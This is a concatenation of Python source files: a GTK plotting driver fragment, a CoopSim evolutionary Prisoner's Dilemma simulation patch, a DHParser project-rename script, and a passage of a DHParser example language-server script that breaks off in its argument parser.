def __init__(self, size=(640,480), title="gtkGraph"):
self.win = gtk.Window()
self.win.set_default_size(*size)
self.win.set_size_request(*size)
self.win.set_resizable(False)
self.win.set_title(title)
self.canvas = gtk.DrawingArea()
Driver.__init__(self, self.canvas,
self.canvas.create_pango_layout(""))
self.win.add(self.canvas)
self.canvas.connect("configure-event", self.onConfigure)
self.canvas.connect("expose-event", self.onExpose)
self.win.show_all()
self.win.connect("destroy", lambda w: gtk.main_quit())
self.clear()
def refresh(self):
"""Refresh the display."""
gc = self.canvas.get_style().fg_gc[gtk.STATE_NORMAL]
w, h = self.pixmap.get_size()
self.canvas.window.draw_drawable(gc, self.pixmap, 0,0,0,0,w,h)
def quit(self):
self.win.destroy()
gtk.main_quit()
def waitUntilClosed(self):
gtk.main()
def onConfigure(self, widget, event):
w, h = widget.window.get_size()
self.pixmap = gdk.Pixmap(widget.window, w, h)
self.changeDrawable(self.pixmap)
self.clear()
self.setColor((0.8,0.8,0.8))
self.fillRect(10, 10, 620, 380)
return True
def onExpose(self, widget, event):
x, y, w, h = event.area
gc = widget.get_style().fg_gc[gtk.STATE_NORMAL]
widget.window.draw_drawable(gc, self.pixmap, x, y, x, y, w, h)
return False
########################################################################
#
# Test
#
########################################################################
if __name__ == "__main__":
import systemTest
systemTest.Test_gtkGfx()
```
#### File: jecki/CoopSim/Simulation_decimal_patch.py
```python
from __future__ import generators # retain python 2.2 compatibility
from decimal import *
import copy, re
from PyPlotter import Gfx, Colors
from PopulationDynamics import Dynamics
import PrisonersDilemma as PD
from PopulationDynamics.Compatibility import *
from Logging import H1,H2,H3, H1X,H2X,H3X, LogNotificationInterface, HTMLLog
NUM_GENERATIONS = 50 # number of generations to start with in the
# population dynamical simulation
NUM_SAMPLES = PD.NUM_SAMPLES # Samples to take of a match if randomizing
# strategies or in game noise is involved
NO_GRAPH_OPTIMIZATION = False # graph drawing will be slowed down but
# accuracy is increased to printing and saving
###############################################################################
#
# classes for the description of simulation setups
#
###############################################################################
class Mutator(object):
"""Describes the mutation of a strategy in the simulation.
original = int: the ordinal number of the strategy that is going
to mutate
mutated = int: the ordinal number of the startegy that 'original' is
going to mutate into
rate = float [0.0 - 1.0]: mutation rate
"""
def __eq__(self, other):
if not isinstance(other, Mutator): return False
if self.original != other.original: return False
if self.mutated != other.mutated: return False
if self.rate != other.rate: return False
return True
def __ne__(self, other):
return not self.__eq__(other)
def __init__(self, original, mutated, rate=0.01):
self.original = original
self.mutated = mutated
self.rate = rate
class SimSetup(object):
"""Contains all data defining a simulation.
name = string: name of the model
strategyList = list of Strategy objects: the list of the strategies
population = tuple: population share for each strategy
correlation = float [0.0-1.0]: correlation factor
gameNoise = float [0.0-1.0]: in game noise
noise = float [0.0-1.0]: evolutionary background noise
iterations = int: number of iterations for one match
samples = int: number of sample matches to take (only useful for
randomizing strategies)
payoff = tuple of floats: payoff tuple (T, R, P, S)
mutators = list of Mutator objects: description of possible
mutation of strategies during the course of the
evolutionary development.
cachedPM = cached payoff matrix
cachedLog = cached tournament log object
"""
def __eq__(self, other):
if not isinstance(other, SimSetup): return False
# names make no difference! if self.name != other.name: return False
if len(self.strategyList) != len(other.strategyList):
return False
for i in xrange(len(self.strategyList)):
if self.strategyList[i] != other.strategyList[i]: return False
if self.population != other.population: return False
if self.correlation != other.correlation: return False
if self.gameNoise != other.gameNoise: return False
if self.noise != other.noise: return False
if self.iterations != other.iterations: return False
if self.samples != other.samples: return False
if self.payoff != other.payoff: return False
if len(self.mutators) != len(other.mutators):
return False
for i in xrange(len(self.mutators)):
if self.mutators[i] != other.mutators[i]: return False
return True
def __ne__(self, other):
return not self.__eq__(other)
## def __setattr__(self, name, value):
## object.__setattr__(self, name, value)
## if name == "population":
## assert len(value) == len(self.strategyList),
## "population vector does not match length of strategy list!"
## elif name == "strategyList":
## if len(value) != len(self.population):
## obejct.__setattr__(self, "population",
## Dynamics.UniformDistribution(len(value)))
def __init__(self, name, strategyList = [], population = None,
correlation = 0.0, gameNoise = 0.0, noise = 0.0,
iterations = 200, samples = NUM_SAMPLES, payoff = (5.,3.,1.,0.),
mutators = [], PM = None, log = None):
self.name = name
self.strategyList = strategyList
if population == None:
self.population = Dynamics.UniformDistribution(len(self.strategyList))
else: self.population = population
self.correlation = correlation
self.gameNoise = gameNoise
self.noise = noise
self.iterations = iterations
self.samples = samples
self.payoff = payoff
self.mutators = mutators
self.cachedPM = PM
self.cachedLog = log
self._userDefined = True # SimApp marks its own setups as False
def fname(self):
"""Returns the name of the setup as a proper file name."""
return self.name.replace("*","x").replace("?","x").replace("/","x")\
.replace("\\","x").replace(" ","_")
def htmlRepresentation(self):
"""Returns extensive information about this setup in HTML format."""
def rr(s):
"replace trailing zeros with blanks"
l = len(s); s2 = s.rstrip("0")
return (s2 + " "*(l - len(s2)))
html = ["<p>" + H2 + '<a name="setup"></a>Simulation setup of ' + \
self.name + H2X + "<br />\n\n"]
## t = "<b>Strategies:</b> "
## for s in self.strategyList:
## t += str(s)
## if len(t) >= 70:
## t += "<br />\n"; html.append(t); t = ""
## else: t += ", "
## if t != "": html.append(t[:-2]+"<br />\n")
html.append("<b>Strategies:</b> ")
snames = [str(s) for s in self.strategyList]
html.append(", ".join(snames))
html.append("<br /><br />\n\n<tt>")
p0 = self.population[0]; scale = 1.0/(1000*len(self.population))
for p in self.population:
if abs(p - p0) > scale:
pop = [rr("%1.5f"%s) for s in self.population]
lines = [", ".join(pop[i:i+5]) for i in xrange(0,len(pop),5)]
html.append("<b>population shares:</b><br />\n")
html.append("<br />\n".join(lines))
html.append("<br /><br />\n\n")
break
else:
html.append("uniform population distribution<br /><br />\n\n")
if self.mutators != []:
html.append("<b>mutations:</b><br />\n")
for d in self.mutators:
s1 = str(self.strategyList[d.original])
s2 = str(self.strategyList[d.mutated])
s1 += " " * max(20-len(s1), 1)
s2 += " " * max(20-len(s2), 1)
html.append(s1 + "=> " + s2 + " " + \
("%1.5f" % d.rate).rstrip("0") + "<br />\n")
html.append("<br />\n")
if self.correlation != 0.0:
html.append("correlation:"+" "*8+"%f<br />\n"%self.correlation)
if self.gameNoise != 0.0:
html.append("game Noise:"+" "*9+"%f<br />\n"%self.gameNoise)
if self.noise != 0.0:
html.append("evolutionary Noise: %f<br />\n"%self.noise)
html.append("payoff parameters: " + \
str(self.payoff) + "<br />\n")
html.append("iterations:"+" "*9+"%i<br />\n"%self.iterations)
if self.gameNoise > 0.0 or \
reduce(lambda a,b: a or b.randomizing, self.strategyList, True):
html.append("match samples:"+" "*6+"%i<br />\n"%self.samples)
html.append("</tt></p>\n")
return "".join(html)
###############################################################################
#
# Simulation class
#
###############################################################################
# generator functions to optimize graph drawing
class xaxisIter(object):
"""-> iterate over virtual x-coordinates with one point for
each screen pixel.
"""
def __init__(self, graph, x1, x2):
self.graph = graph
a = self.graph._scaleX(x1); b = self.graph._scaleX(x2)
self.rngIter = xrange(a, b+2).__iter__()
self.pos = self.graph._invX(self.rngIter.next())
def check(self, x):
if x >= self.pos:
try:
self.pos = self.graph._invX(self.rngIter.next())
except StopIteration:
pass # actually this should never happen, catching it anyway!
return True
else: return NO_GRAPH_OPTIMIZATION
def mutation(population, degenList):
"""Apply mutation to a population"""
p = list(population)
for d in degenList:
x = population[d.original] * d.rate
p[d.original] -= x
p[d.mutated] += x
return tuple(p)
NORMAL_CAPTION_PEN = Gfx.BLACK_PEN
SMALL_CAPTION_PEN = Gfx.Pen(color = Gfx.BLACK, fsize = Gfx.SMALL)
class Simulation(object):
"""The simulation class is responsible for running a simulation
and produing an output of the results in graphical form as well
as as html log.
Attributes:
graph : A Graph.Cartesian object for the graphical representation
of the population dynamics
simlpex : A Simplex.Diagram object for producing a simplex
diagram of the population dynamics (only if exactly
three strategies are present in the simulation!)
notifier : A Logging.LogNotificationInterface for communicating
the progress of the simulation to the GUI
log : A Logging.HTMLLog for logging the simulation results
setup : A copy (!) of the simulation setup. (The progress of
the population dynamical simulation is written into
the 'population' field of this copy)
payoffMatrix: The payoff matrix of the tournament part of the
simulation
dynamicsFunction: The dynamics function for the population dynamical
development
rangeStack : Sequence of the respective range parameters of the
simulation graph (x1,y1,x2,y2), one for each call
of the method 'continueSim'
imgDirName : Name of the directory to write the images of the html
log to (only if the log is actually saved to disk!)
simplexName : file name of the simplex graph, if the html log is saved
firstGeneration: the first generation to start the next population
dynamical cycle with (when calling continueSim)
lastGeneration: the last generation of the next cycle
"""
def __init__(self, graph, simplex, log, notifier):
self.graph = graph
self.simplex = simplex
self.notifier = notifier
self.log = log
self.setup = None
self.payoffMatrix = None
self.dynamicsFunction = None
self.rangeStack = []
self.imgdirName = ""
self.simplexName = ""
self.firstGeneration = 1
self.lastGeneration = NUM_GENERATIONS
self._dontLogTwiceFlag = False
def _prepareEvLog(self):
if not self._alreadyLogged:
self._alreadyLogged = True
self.imgdirName = self.setup.fname() + "_images"
self.log.appendAt("toc",
'<a href="#evranking">4. Evolutionary Simulation</a><br />\n')
self.log.append(H2 + \
'<a name="evranking"></a>Evolutionary Simulation:' + \
H2X + "<br />\n\n")
if len(self.setup.strategyList) == 3:
self.simplexName = self.setup.fname() + "_simplex"
path = self.imgdirName + "/" + self.simplexName
self.log.append('<div align="center">' + \
'<a href="'+path+'.png">' + \
'<img src="'+path+'_web.png" alt="Image: '+\
self.simplexName + '.png not found!" />' + \
'</a></div><br /><br />\n')
self.log.entryPoint("evranking")
def newSetup(self, setup, progressCallback = lambda f:1):
self._alreadyLogged = False
self.setup = copy.copy(setup)
for s in self.setup.strategyList: s.register(self.setup)
self.firstGeneration = 1;
self.lastGeneration = NUM_GENERATIONS
if self.setup.cachedPM == None:
self.log.clear()
self.log.pageTitle(self.setup.name)
self.log.append(H1+'<a name="top"></a>CoopSim - Simulation: '+\
self.setup.name + H1X + "\n\n")
self.log.append(H2+'<a name="toc"></a>Table of Contents'+ \
H2X + "\n\n<p>")
self.log.append('<a href="#setup">0. Simulation Setup</a><br />\n')
self.log.entryPoint("toc")
self.log.append("</p><br />\n")
self.log.append(setup.htmlRepresentation())
self.log.append('<div align="right"><a href="#top">[top]' + \
'</a></div><br />\n')
p = self.setup.payoff
a = array([[[p[2],p[2]],[p[0],p[3]]],[[p[3],p[0]],[p[1],p[1]]]])
self.payoffMatrix = PD.GenPayoffMatrix(self.setup.strategyList,
a, self.setup.iterations, self.setup.samples,
self.setup.gameNoise,self.log,progressCallback)
setup.cachedPM = self.payoffMatrix
self.setup.cachedPM = setup.cachedPM
setup.cachedLog = self.log.backup()
self.setup.cachedLog = setup.cachedLog
else:
self.payoffMatrix = self.setup.cachedPM
self.log.replay(self.setup.cachedLog)
self.notifier.updateLog(self.log.getHTMLPage())
## want decimals ?
setcontext(Context(prec=500))
for x in xrange(len(self.setup.population)):
for y in xrange(len(self.setup.population)):
self.payoffMatrix[x, y] = Decimal(repr(self.payoffMatrix[x,y]))
self.setup.correlation = Decimal(repr(self.setup.correlation))
self.setup.noise = Decimal(repr(self.setup.noise))
p = [Decimal(repr(x)) for x in self.setup.population]
self.setup.population = tuple(p)
## end decimals
df = Dynamics.GenDynamicsFunction(self.payoffMatrix,
self.setup.correlation,
self.setup.noise, 2)
if self.setup.mutators == []:
self.dynamicsFunction = df
else:
self.dynamicsFunction = lambda p: mutation(df(p), \
self.setup.mutators)
ysize = 1.0 / max(1.0, len(self.setup.strategyList)-1)
self.graph.reset(0, 0.0, self.lastGeneration, ysize)
self.rangeStack = []
i = 0
for s in self.setup.strategyList:
if Colors.colors[i] == (1.0, 1.0, 0.0): i += 1
self.graph.addPen(str(s), Gfx.Pen(Colors.colors[i], Gfx.MEDIUM),
False)
i += 1
if i > len(Colors.colors): i = 0
self.graph.setTitle('Population dynamics of "'+self.setup.name+'"')
if len(self.setup.strategyList) > 10:
self.graph.setStyle(captionPen = SMALL_CAPTION_PEN, redraw = False)
else:
self.graph.setStyle(captionPen = NORMAL_CAPTION_PEN, redraw = False)
self.graph.redrawCaption()
if len(self.setup.strategyList) == 3:
self.simplex.setFunction(self.dynamicsFunction)
self.simplex.setTitle('Simplex diagram of "'+self.setup.name+'"')
self.simplex.setLabels(str(self.setup.strategyList[0]),
str(self.setup.strategyList[1]),
str(self.setup.strategyList[2]))
else:
self.simplex.setFunction(lambda p:p)
if len(self.setup.strategyList) > 3:
self.simplex.setTitle("Too many strategies for " + \
"a simplex diagram!")
else:
self.simplex.setTitle("Too few strategies for "\
"a simplex diagram!")
self.simplex.setLabels("","","")
self._prepareEvLog()
def continueSim(self, record = None):
if self.setup == None: return
self.notifier.statusBarHint("Running...")
if self.firstGeneration > 1:
self.graph.adjustRange(0, 0.0, self.lastGeneration, self.graph.y2)
else:
k = 0
for s in self.setup.strategyList:
self.graph.addValue(str(s), 0, float(self.setup.population[k]))
k += 1
#self.simplex.show()
p = self.setup.population
pixelSteps = xaxisIter(self.graph, self.firstGeneration,
self.lastGeneration)
for i in xrange(self.firstGeneration, self.lastGeneration+1):
p = self.dynamicsFunction(p)
if pixelSteps.check(i):
k = 0
for s in self.setup.strategyList:
self.graph.addValue(str(s), i, float(p[k]))
k += 1
if record != None: record.append(p)
self.setup.population = p
self._prepareEvLog()
anchor = "generation%i" % self.lastGeneration
linkstr = ' <a href="#'+anchor+'">'+ \
'Ranking after %i generations</a>' % \
self.lastGeneration + "<br />\n"
self.log.appendAt("toc", linkstr)
self.log.appendAt("evranking", re.sub(" ","",linkstr))
self.log.append("\n"+H3+'<a name="'+anchor+'"></a>' +\
"Ranking after %i generations:" % \
self.lastGeneration + H3X + "<br />\n\n<p><pre>")
ranking = zip(self.setup.population,
#Dynamics._QuickFitness2(self.setup.population, self.payoffMatrix),
[str(s) for s in self.setup.strategyList])
ranking.sort(); ranking.reverse()
k = 1
for r, name in ranking:
s = "%3i." % k + name + " "*max(40-len(name),1) + \
"%1.4f " % r + "\n"
self.log.append(s)
k += 1
self.log.append("</pre><br />\n")
imgName = self.setup.fname() + "_gn%i" % self.lastGeneration
path = self.imgdirName + "/" + imgName
self.log.append('<div align="center">'+\
'<a href="' + path + '.png">' + \
'<img src="'+path+'_web.png"'+'" alt="Image: ' + \
imgName + '.png not found!" /></a></div><br />\n')
self.log.append("</p>\n")
self.log.append('<div align="right"><a href="#top">[top]' + \
'</a></div><br />\n')
self.rangeStack.append((imgName, self.graph.x1, self.graph.y1,
self.graph.x2, min(self.graph.y2, 1.0)))
self.notifier.updateLog(self.log.getHTMLPage())
if self.firstGeneration <= 1: self.notifier.logToStart()
self.firstGeneration = self.lastGeneration + 1
self.lastGeneration = self.lastGeneration * 2
self.notifier.statusBarHint("Ready.")
```
|
{
"source": "jecki/DHParser",
"score": 3
}
|
#### File: DHParser/scripts/dhparser_rename.py
```python
import os
import re
import shutil
import sys
def save_project(path: str) -> bool:
"""Copies the old project to another directory."""
if os.path.exists(path + '_save'):
return False
shutil.copytree(path, path + '_save')
return True
def check_projectdir(path: str) -> bool:
"""Verifies that `path` if a valid DHParser project directory."""
name = os.path.basename(path)
def check(*args):
for filename in args:
filepath = os.path.join(path, filename)
if not (os.path.exists(filepath) and os.path.isfile(filepath)):
print('Could not find ' + filepath)
return False
return True
return check(name + '.ebnf', name + 'Parser.py', "tst_%s_grammar.py" % name)
def rename_projectdir(path: str, new: str) -> bool:
"""
Renames the dhparser project in `path`. This implies renaming
the directory itself, the test and compile script and the data types
and variables that contain the project's name as part of their name.
"""
name = os.path.basename(path)
save = os.getcwd()
os.chdir(path)
os.rename(name + '.ebnf', new + '.ebnf')
os.rename(name + 'Parser.py', new + 'Parser.py')
os.rename('tst_%s_grammar.py' % name, 'tst_%s_grammar.py' % new)
for fname in (new + 'Parser.py', 'tst_%s_grammar.py' % new):
with open(fname, 'r', encoding='utf-8') as f:
content = f.read()
with open(fname, 'w', encoding='utf-8') as f:
f.write(content.replace(name, new))
os.chdir('..')
os.rename(name, new)
os.chdir(save)
def rename_project(projectdir: str, new_name: str) -> str:
"""Renames a project. Returns an error string in case of failure
or the empty string if successful."""
if not os.path.isdir(projectdir):
return projectdir + " is not a directory!"
elif check_projectdir(projectdir):
m = re.match('\w+', new_name)
if m and len(m.group(0)) == len(new_name):
if save_project(projectdir):
rename_projectdir(projectdir, new_name)
else:
return 'Could not save old project to ' + os.path.basename(projectdir) + '_saved!'
else:
return new_name + " is not a valid project name!"
else:
return projectdir + " does not seem to be a DHParser-project directory!"
return ''
if __name__ == "__main__":
if len(sys.argv) == 3:
projectdir = sys.argv[1]
new_name = sys.argv[2]
error = rename_project(projectdir, new_name)
if error:
print(error)
sys.exit(1)
else:
print('Usage: python dhparser_rename.py PROJECT_DIRECTORY NEW_PROJECT_NAME')
```
#### File: examples/readme_example/readme_exampleServer.py
```python
import asyncio
import os
import sys
DEBUG = False
assert sys.version_info >= (3, 5, 7), "DHParser.server requires at least Python-Version 3.5.7"
scriptpath = os.path.dirname(__file__)
servername = os.path.splitext(os.path.basename(__file__))[0]
STOP_SERVER_REQUEST_BYTES = b"__STOP_SERVER__" # hardcoded in order to avoid import from DHParser.server
IDENTIFY_REQUEST = "identify()"
LOGGING_REQUEST = 'logging("")'
LOG_PATH = 'LOGS/'
DEFAULT_HOST = '127.0.0.1'
DEFAULT_PORT = 8888
ALTERNATIVE_PORTS = [8888, 8889, 8898, 8980, 8988, 8989]
DATA_RECEIVE_LIMIT = 262144
SERVER_REPLY_TIMEOUT = 3
KNOWN_HOST = '' # if host and port are retrieved from a config file, their
KNOWN_PORT = -2 # values are stored to these global variables
config_filename_cache = ''
CONNECTION_TYPE = 'tcp' # valid values: 'tcp', 'streams'
echo_file = None
def echo(msg: str):
"""Writes the message to stdout, or redirects it to a text file, in
case the server is connected via IO-streams instead of tcp."""
global CONNECTION_TYPE, echo_file
if CONNECTION_TYPE == 'tcp':
print(msg)
elif CONNECTION_TYPE == 'streams':
if echo_file is None or echo_file.closed:
new_file_flag = echo_file is None
echo_file = open('print.txt', 'a')
if new_file_flag:
import atexit
atexit.register(echo_file.close)
import time
t = time.localtime()
echo_file.write("\n\nDate and Time: %i-%i-%i %i:%i\n\n" % t[:5])
echo_file.write(msg)
echo_file.write('\n')
echo_file.flush()
else:
print('Unknown connectsion type: %s. Must either be streams or tcp.' % CONNECTION_TYPE)
def debug(msg: str):
"""Prints a debugging message if DEBUG-flag is set"""
global DEBUG
if DEBUG:
echo(msg)
def get_config_filename() -> str:
"""
Returns the file name of a temporary config file that stores
the host and port of the currently running server.
"""
global config_filename_cache
if config_filename_cache:
return config_filename_cache
def probe(dir_list) -> str:
for tmpdir in dir_list:
if os.path.exists(tmpdir) and os.path.isdir(tmpdir):
return tmpdir
return ''
if sys.platform.find('win') >= 0:
tmpdir = probe([r'C:\TEMP', r'C:\TMP', r'\TEMP', r'\TMP'])
else:
tmpdir = probe(['~/tmp', '/tmp', '/var/tmp', 'usr/tmp'])
config_filename_cache = os.path.join(tmpdir, os.path.basename(__file__)) + '.cfg'
return config_filename_cache
def retrieve_host_and_port():
"""
Retrieve host and port from temporary config file or return default values
for host and port, in case the temporary config file does not exist.
"""
global DEFAULT_HOST, DEFAULT_PORT, KNOWN_HOST, KNOWN_PORT
host = DEFAULT_HOST
port = DEFAULT_PORT
cfg_filename = get_config_filename()
try:
with open(cfg_filename) as f:
host, ports = f.read().strip(' \n').split(' ')
port = int(ports)
if (host, port) != (KNOWN_HOST, KNOWN_PORT):
debug('Retrieved host and port value %s:%i from config file "%s".'
% (host, port, cfg_filename))
KNOWN_HOST, KNOWN_PORT = host, port
except FileNotFoundError:
debug('File "%s" does not exist. Using default values %s:%i for host and port.'
% (cfg_filename, host, port))
except ValueError:
debug('removing invalid config file: ' + cfg_filename)
os.remove(cfg_filename)
return host, port
def asyncio_run(coroutine):
"""Backward compatible version of Pyhon3.7's `asyncio.run()`"""
if sys.version_info >= (3, 7):
return asyncio.run(coroutine)
else:
try:
loop = asyncio.get_event_loop()
except RuntimeError:
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
try:
return loop.run_until_complete(coroutine)
finally:
try:
loop.run_until_complete(loop.shutdown_asyncgens())
finally:
asyncio.set_event_loop(None)
loop.close()
def json_rpc(func_name, params={}, ID=None) -> dict:
"""Generates a JSON-RPC-call for `func` with parameters `params`"""
return {"jsonrpc": "2.0", "method": func_name, "params": params, "id": ID}
class readme_exampleCPUBoundTasks:
def __init__(self, lsp_data: dict):
from DHParser.lsp import gen_lsp_table
self.lsp_data = lsp_data
self.lsp_table = gen_lsp_table(self, prefix='lsp_')
class readme_exampleBlockingTasks:
def __init__(self, lsp_data: dict):
from DHParser.lsp import gen_lsp_table
self.lsp_data = lsp_data
self.lsp_table = gen_lsp_table(self, prefix='lsp_')
class readme_exampleLanguageServerProtocol:
"""
For the specification and implementation of the language server protocol, see:
https://code.visualstudio.com/api/language-extensions/language-server-extension-guide
https://microsoft.github.io/language-server-protocol/
https://langserver.org/
"""
def __init__(self):
from DHParser.lsp import gen_lsp_table
self.lsp_data = {
'processId': 0,
'rootUri': '',
'clientCapabilities': {},
'serverInfo': { "name": "readme_example-Server", "version": "0.1" },
'serverCapabilities': {}
}
self.connection = None
self.cpu_bound = readme_exampleCPUBoundTasks(self.lsp_data)
self.blocking = readme_exampleBlockingTasks(self.lsp_data)
self.lsp_table = gen_lsp_table(self, prefix='lsp_')
self.lsp_fulltable = self.lsp_table.copy()
assert self.lsp_fulltable.keys().isdisjoint(self.cpu_bound.lsp_table.keys())
self.lsp_fulltable.update(self.cpu_bound.lsp_table)
assert self.lsp_fulltable.keys().isdisjoint(self.blocking.lsp_table.keys())
self.lsp_fulltable.update(self.blocking.lsp_table)
def connect(self, connection):
self.connection = connection
def lsp_initialize(self, **kwargs):
# # This has been taken care of by DHParser.server.Server.lsp_verify_initialization()
# if self.shared.initialized or self.shared.processId != 0:
# return {"code": -32002, "message": "Server has already been initialized."}
# self.shared.shutdown = False
self.lsp_data['processId'] = kwargs['processId']
self.lsp_data['rootUri'] = kwargs['rootUri']
self.lsp_data['clientCapabilities'] = kwargs['capabilities']
return {'capabilities': self.lsp_data['serverCapabilities'],
'serverInfo': self.lsp_data['serverInfo']}
def lsp_custom(self, **kwargs):
return kwargs
def lsp_shutdown(self):
self.lsp_data['processId'] = 0
self.lsp_data['rootUri'] = ''
self.lsp_data['clientCapabilities'] = {}
return {}
def run_server(host, port, log_path=None):
"""
Starts a new readme_exampleServer. If `port` is already occupied, different
ports will be tried.
"""
global KNOWN_HOST, KNOWN_PORT
global scriptpath, servername
from multiprocessing import set_start_method
# 'forkserver' or 'spawn' required to avoid broken process pools
if sys.platform.lower().startswith('linux') : set_start_method('forkserver')
else: set_start_method('spawn')
grammar_src = os.path.abspath(__file__).replace('Server.py', '.ebnf')
dhparserdir = os.path.abspath(os.path.join(scriptpath, '../..'))
if scriptpath not in sys.path:
sys.path.append(scriptpath)
if dhparserdir not in sys.path:
sys.path.append(dhparserdir)
# from tst_readme_example_grammar import recompile_grammar
# recompile_grammar(os.path.join(scriptpath, 'readme_example.ebnf'), force=False)
from DHParser.dsl import recompile_grammar
if not recompile_grammar(grammar_src, force=False,
notify=lambda: print('recompiling ' + grammar_src)):
print('\nErrors while recompiling "%s":' % grammar_src +
'\n--------------------------------------\n\n')
with open('readme_example_ebnf_ERRORS.txt', encoding='utf-8') as f:
print(f.read())
sys.exit(1)
from readme_exampleParser import compile_src
from DHParser.server import Server, probe_tcp_server, StreamReaderProxy, StreamWriterProxy
from DHParser.lsp import gen_lsp_table
readme_example_lsp = readme_exampleLanguageServerProtocol()
lsp_table = readme_example_lsp.lsp_fulltable.copy()
lsp_table.setdefault('default', compile_src)
readme_example_server = Server(rpc_functions=lsp_table,
cpu_bound=readme_example_lsp.cpu_bound.lsp_table.keys(),
blocking=readme_example_lsp.blocking.lsp_table.keys(),
connection_callback=readme_example_lsp.connect,
server_name="readme_exampleServer",
strict_lsp=True)
if log_path is not None:
# echoing does not work with stream connections!
readme_example_server.echo_log = True if port >= 0 and host else False
msg = readme_example_server.start_logging(log_path.strip('" \''))
if readme_example_server.echo_log: echo(msg)
if port < 0 or not host:
# communication via streams instead of tcp server
reader = StreamReaderProxy(sys.stdin)
writer = StreamWriterProxy(sys.stdout)
readme_example_server.run_stream_server(reader, writer)
return
cfg_filename = get_config_filename()
overwrite = not os.path.exists(cfg_filename)
ports = ALTERNATIVE_PORTS.copy() if port == DEFAULT_PORT else []
if port in ports:
ports.remove(port)
ports.append(port)
while ports:
port = ports.pop()
if (host, port) == (KNOWN_HOST, KNOWN_PORT):
ident = asyncio_run(probe_tcp_server(host, port, SERVER_REPLY_TIMEOUT))
if ident:
if ident.endswith(servername):
echo('A server of type "%s" already exists on %s:%i.' % (servername, host, port)
+ ' Use --port option to start a secondary server on a different port.')
sys.exit(1)
if ports:
echo('"%s" already occupies %s:%i. Trying port %i' % (ident, host, port, ports[-1]))
continue
else:
echo('"%s" already occupies %s:%i. No more ports to try.' % (ident, host, port))
sys.exit(1)
if overwrite:
try:
with open(cfg_filename, 'w') as f:
debug('Storing host and port value %s:%i in file "%s".'
% (host, port, cfg_filename))
f.write(host + ' ' + str(port))
except (PermissionError, IOError) as e:
echo('%s: Could not write temporary config file: "%s"' % (str(e), cfg_filename))
ports = []
else:
echo('Configuration file "%s" already existed and was not overwritten. '
'Use option "--port %i" to stop this server!' % (cfg_filename, port))
try:
debug('Starting server on %s:%i' % (host, port))
readme_example_server.run_tcp_server(host, port) # returns only after server has stopped!
ports = []
except OSError as e:
if not (ports and e.errno == 98):
echo(e)
echo('Could not start server. Shutting down!')
sys.exit(1)
elif ports:
echo('Could not start server on %s:%i. Trying port %s' % (host, port, ports[-1]))
else:
echo('Could not start server on %s:%i. No more ports to try.' % (host, port))
finally:
if not ports:
echo('Server on %s:%i stopped' % (host, port))
if overwrite:
try:
os.remove(cfg_filename)
debug('removing temporary config file: ' + cfg_filename)
except FileNotFoundError:
pass
async def send_request(reader, writer, request, timeout=SERVER_REPLY_TIMEOUT) -> str:
"""Sends a request and returns the decoded response."""
writer.write(request.encode() if isinstance(request, str) else request)
try:
data = await asyncio.wait_for(reader.read(DATA_RECEIVE_LIMIT), timeout)
except asyncio.TimeoutError as e:
echo('Server did not answer to "%s"-Request within %i seconds.'
% (request, timeout))
raise e
return data.decode()
async def close_connection(writer):
"""Closes the communication-channel."""
writer.close()
if sys.version_info >= (3, 7):
await writer.wait_closed()
async def final_request(reader, writer, request, timeout=SERVER_REPLY_TIMEOUT) -> str:
"""Sends a (last) request and then closes the communication channel.
Returns the decoded response to the request."""
try:
data = await send_request(reader, writer, request, timeout)
finally:
await close_connection(writer)
return data
async def single_request(request, host, port, timeout=SERVER_REPLY_TIMEOUT) -> str:
"""Opens a connection, sends a single request, and closes the connection
again before returning the decoded result."""
try:
reader, writer = await asyncio.open_connection(host, port)
except ConnectionRefusedError:
echo('No server running on: ' + host + ':' + str(port))
sys.exit(1)
try:
result = await final_request(reader, writer, request, timeout)
except asyncio.TimeoutError:
sys.exit(1)
return result
async def connect_to_daemon(host, port) -> tuple:
"""Opens a connections to the server on host, port. Returns the reader,
writer and the string result of the identification-request."""
global KNOWN_HOST, KNOWN_PORT, servername
delay = 0.05
countdown = SERVER_REPLY_TIMEOUT / delay + 10
ident, reader, writer = None, None, None
cfg_filename = get_config_filename()
save = (host, port)
while countdown > 0:
try:
if (host, port) != (KNOWN_HOST, KNOWN_PORT):
raise ValueError # don't connect if host and port are not either
# read from config-file or specified explicitly on the command line
reader, writer = await asyncio.open_connection(host, port)
try:
ident = await send_request(reader, writer, IDENTIFY_REQUEST)
if not ident.endswith(servername):
ident = None
raise ValueError
countdown = 0
except (asyncio.TimeoutError, ValueError):
echo('Server "%s" not found on %s:%i' % (servername, host, port))
await close_connection(writer)
reader, writer = None, None
await asyncio.sleep(delay)
countdown -= 1
h, p = retrieve_host_and_port()
if (h, p) != (host, port):
# try again with a different host and port
host, port = h, p
except (ConnectionRefusedError, ValueError):
await asyncio.sleep(delay)
if os.path.exists(cfg_filename):
host, port = retrieve_host_and_port()
countdown -= 1
if ident is not None and save != (host, port):
echo('Server "%s" found on different port %i' % (servername, port))
return reader, writer, ident
async def start_server_daemon(host, port, requests) -> list:
"""Starts a server in the background and opens a connections. Sends requests if
given and returns a list of their results."""
import subprocess
ident, reader, writer = None, None, None
if os.path.exists(get_config_filename()):
reader, writer, ident = await connect_to_daemon(host, port)
if ident is not None:
if not requests:
echo('Server "%s" already running on %s:%i' % (ident, host, port))
else:
try:
subprocess.Popen([__file__, '--startserver', host, str(port)])
except OSError:
subprocess.Popen([sys.executable, __file__, '--startserver', host, str(port)])
reader, writer, ident = await connect_to_daemon(host, port)
if ident is None:
echo('Could not start server or establish connection in time :-(')
sys.exit(1)
if not requests:
echo('Server "%s" started.' % ident)
results = []
for request in requests:
assert request
results.append(await send_request(reader, writer, request))
await close_connection(writer)
return results
def parse_logging_args(args):
if args.logging or args.logging is None:
global host, port
if port >= 0 and host:
echo = repr('ECHO_ON') if isinstance(args.startserver, list) else repr('ECHO_OFF')
else: # echoing does not work with stream connections!
echo = repr('ECHO_OFF')
if args.logging in ('OFF', 'STOP', 'NO', 'FALSE'):
log_path = repr(None)
echo = repr('ECHO_OFF')
elif args.logging in ('ON', 'START', 'YES', 'TRUE'):
log_path = repr(LOG_PATH)
else:
log_path = repr(LOG_PATH) if args.logging is None else repr(args.logging)
request = LOGGING_REQUEST.replace('""', ", ".join((log_path, echo)))
debug('Logging to %s with call %s' % (log_path, request))
return log_path, request
else:
return None, ''
if __name__ == "__main__":
from argparse import ArgumentParser
parser = ArgumentParser(description="Setup and Control of a Server for processing readme_example-files.")
action_group = parser.add_mutually_exclusive_group()
action_group.add_argument('file', nargs='?')
action_group.add_argument('-t', '--status', action='store_true',
